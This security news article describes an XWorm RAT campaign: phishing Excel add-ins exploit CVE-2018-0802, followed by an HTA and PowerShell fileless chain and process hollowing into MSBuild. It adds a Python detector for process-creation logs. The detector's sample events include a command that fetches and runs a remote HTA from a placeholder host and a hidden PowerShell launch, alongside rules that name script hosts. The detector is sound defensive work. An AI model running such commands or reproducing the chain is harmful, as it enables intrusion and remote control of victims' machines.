A recent cyber-espionage campaign has emerged that uses the XWorm Remote Access Trojan (RAT) to infiltrate systems through carefully crafted phishing emails and a long-standing Microsoft Office vulnerability. Security experts are raising alarms about the operation, which underscores the ongoing threat posed by legacy software flaws in today's digital landscape.
First detected in 2022, XWorm has gained notoriety in underground markets, including Telegram, where it is actively promoted. This formidable Windows malware provides attackers with comprehensive remote control over a victim’s computer, facilitating surveillance, data theft, and even enabling ransomware or distributed denial-of-service (DDoS) attacks.
The latest campaign initiates with business-oriented phishing emails, crafted in multiple languages. These messages masquerade as purchase orders, shipment confirmations, or payment notifications, enticing recipients to open an attached Excel add-in file to review purported details. However, this attachment is malicious, and opening it triggers a silent infection sequence.
Excel Exploit Starts Fileless Attack
The Excel document conceals a hidden Object Linking and Embedding (OLE) component, engineered to exploit CVE-2018-0802, a remote code execution vulnerability in Microsoft Equation Editor. Upon opening the file, the vulnerable program processes malformed data, executing embedded shellcode that downloads an HTML Application (HTA) file onto the system. This file is then executed using Windows utilities.
Subsequently, the HTA script launches PowerShell, which retrieves a disguised image file from the internet. Concealed within this image is a .NET malware module encoded in Base64. Rather than writing files to disk, this module loads directly into memory, complicating detection efforts. It then downloads the final XWorm payload, injecting it into a newly created Msbuild.exe process through a technique known as process hollowing, which replaces the legitimate program’s memory with malicious code while preserving the trusted process name.
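The chain described above leaves a distinctive parent/child process trail: the Equation Editor host spawning a child, mshta.exe handing off to PowerShell, and PowerShell starting MSBuild with no build input. The following is an added example (not code from the article or from any vendor) that scores constructed process-creation events against those three stages and reports whether the full chain was observed. Field names loosely follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the paths, command lines and the PO_48213.xlam file name are invented for illustration.

```python
"""Stage-by-stage detection of the XWorm delivery chain over process-creation
telemetry.  Added example: the events below are constructed, not real logs."""
from dataclasses import dataclass
from typing import List, Optional
import ntpath


@dataclass(frozen=True)
class ProcEvent:
    record_id: int
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Alert:
    record_id: int
    rule: str
    severity: str


# The Equation Editor host binary; CVE-2018-0802 shellcode runs inside it,
# so any child it creates is attacker-controlled.
EQUATION_EDITOR = "eqnedt32.exe"
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SCRIPT_HOSTS = SHELLS | {"mshta.exe", "wscript.exe", "cscript.exe"}
# Tokens a legitimate MSBuild invocation normally carries (a project or solution).
BUILD_INPUTS = (".proj", ".csproj", ".vbproj", ".sln", ".xml", ".targets")
CHAIN_STAGES = ("equation_editor_spawn", "mshta_to_shell", "msbuild_no_project")


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def classify(ev: ProcEvent) -> Optional[Alert]:
    """Map one process-creation event to the chain stage it matches, if any."""
    parent, child = _name(ev.parent_image), _name(ev.image)
    # Stage 1: Equation Editor has no business spawning processes.
    if parent == EQUATION_EDITOR:
        return Alert(ev.record_id, "equation_editor_spawn", "high")
    # Stage 2: the HTA stage launches PowerShell from mshta.exe.
    if parent == "mshta.exe" and child in SHELLS:
        return Alert(ev.record_id, "mshta_to_shell", "high")
    # Stage 3: a shell starting MSBuild with nothing to build is the hollowing
    # pattern; MSBuild with a project file is an ordinary developer action.
    if parent in SHELLS and child == "msbuild.exe":
        args = ev.command_line.lower()
        if not any(tok in args for tok in BUILD_INPUTS):
            return Alert(ev.record_id, "msbuild_no_project", "high")
        return Alert(ev.record_id, "shell_to_msbuild", "medium")
    # Broader catch-all: an Office host launching any script interpreter.
    if parent in OFFICE_HOSTS and child in SCRIPT_HOSTS:
        return Alert(ev.record_id, "office_spawns_script_host", "medium")
    return None


def detect(events: List[ProcEvent]) -> List[Alert]:
    return [a for a in (classify(e) for e in events) if a is not None]


def chain_complete(alerts: List[Alert]) -> bool:
    """True when all three chain stages appear in order in the alert stream."""
    nxt = 0
    for a in alerts:
        if nxt < len(CHAIN_STAGES) and a.rule == CHAIN_STAGES[nxt]:
            nxt += 1
    return nxt == len(CHAIN_STAGES)


# Constructed sample: one infection (records 2-5) plus benign noise (1, 6, 7).
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSB = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [
    ProcEvent(1, r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              "EXCEL.EXE PO_48213.xlam"),
    ProcEvent(2, r"C:\Windows\System32\svchost.exe", EQN, "EQNEDT32.EXE -Embedding"),
    ProcEvent(3, EQN, r"C:\Windows\System32\mshta.exe",
              "mshta http://example.invalid/stage.hta"),
    ProcEvent(4, r"C:\Windows\System32\mshta.exe", PS,
              "powershell -w hidden -c <script elided>"),
    ProcEvent(5, PS, MSB, "MSBuild.exe"),
    ProcEvent(6, r"C:\Windows\System32\cmd.exe", MSB, "MSBuild.exe app.csproj /t:Build"),
    ProcEvent(7, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad"),
]

if __name__ == "__main__":
    alerts = detect(SAMPLE_EVENTS)
    for a in alerts:
        print(f"record {a.record_id}: {a.rule} [{a.severity}]")
    print("full chain observed:", chain_complete(alerts))
```

Record 2 (Equation Editor started by svchost.exe via DCOM) deliberately produces no alert, since that is how the component is launched legitimately; the high-confidence signal is the child it spawns in record 3. Record 6 shows why the MSBuild rule keys on the absence of a build input rather than on MSBuild itself.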
The payload analyzed in this campaign corresponds to XWorm version 7.2.
Remote Control, Data Theft, and Plugins
Upon execution, XWorm establishes a connection with its command-and-control (C2) server, registering the infected device. The malware encrypts communications using AES, transmitting critical system details such as the username, operating system, hardware specifications, and antivirus software in use.
This enables attackers to issue commands to the compromised machine, with capabilities that include running applications, downloading files, opening websites, recording keystrokes, capturing screenshots, and even controlling the camera or microphone. Furthermore, the malware can restart or shut down the computer and execute system commands remotely.
A standout feature of XWorm is its plugin architecture, which can load more than 50 optional modules stored in the Windows registry to extend its functionality. These plugins facilitate credential theft, browser data harvesting, unauthorized remote desktop access, and the execution of DDoS attacks. In certain scenarios, attackers can also deploy ransomware from the same infection.
Researchers emphasize that this campaign highlights a persistent security challenge: organizations frequently neglect to patch outdated Office components. Despite the age of the Equation Editor vulnerability, it remains actively exploited because the outdated executable is still present on many systems. Security experts recommend disabling legacy Office components, applying the necessary patches, and exercising caution with unexpected attachments. A single opened document can grant attackers complete control of a system within minutes.